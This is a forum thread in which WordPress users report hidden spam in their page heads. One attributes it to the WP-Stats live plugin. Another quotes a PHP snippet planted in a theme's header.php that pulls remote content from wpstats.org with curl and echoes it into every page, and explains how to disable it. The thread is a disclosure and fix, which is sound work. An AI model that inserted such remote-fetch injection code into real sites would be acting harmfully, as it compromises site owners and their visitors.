A note to anyone using the WP-Stats live plugin-

Not sure what's going on with it, but it is adding a bunch of hidden spam to the page head (starts with:)


I spent a bit of time searching my Wordpress install, thinking it had been compromised, but it was a plugin (a google search for a longer phrase turns up thousands of WP sires using this plugin).

The upside- I was away from home, and learned a bit more on using iSSH and viewing page source with an iPad .

_________________
--
Chris Bryant

This forum and this thread was the only one that would come up above the spam listings in the SERPs so it's the one I'll contribute to. Hi.

One of my WP installs got hacked, but it did not have the WP Live Stats plugin installed.

The install is using the "Options Theme", so there may be any number of themes out there that are vulnerable.

In this case the relevant block of code is in header.php

   <?php if(function_exists('curl_init')) { $url = "http://www.wpstats.org/jquery-1.6.3.min.js"; $ch = curl_init(); $timeout = 5; curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); $data = curl_exec($ch); curl_close($ch); echo "$data"; } ?>

Commenting that out is sufficient to defeat the hack. (Double slash before the if will work...)

<?php // if(... etc.

Sorry I can't show you a before and after example but it's a site in development for a client.

"The biggest danger to your sex life is boredom"... it hits too close to home.